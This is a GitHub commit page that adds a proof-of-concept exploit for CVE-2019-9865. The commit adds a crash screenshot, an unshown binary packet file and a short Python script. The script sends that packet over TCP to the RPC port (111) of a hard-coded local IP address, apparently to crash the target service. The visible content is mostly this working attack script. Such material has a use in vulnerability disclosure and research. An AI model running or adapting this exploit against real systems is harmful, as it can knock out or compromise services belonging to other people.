Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
xzz authored and xzz committed Aug 11, 2019
1 parent 283e434 commit 9796b30
Show file tree
Hide file tree
Showing 3 changed files with 13 additions and 0 deletions.
Binary file added CVE-2019-9865/crash.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CVE-2019-9865/pkt
Binary file not shown.
13 changes: 13 additions & 0 deletions CVE-2019-9865/poc.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
import socket

host = "192.168.10.199"
rpcPort = 111

f = open("pkt", 'rb')
data = f.read()
f.close()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, rpcPort))
sock.send(data)
sock.close()

0 comments on commit 9796b30

Please sign in to comment.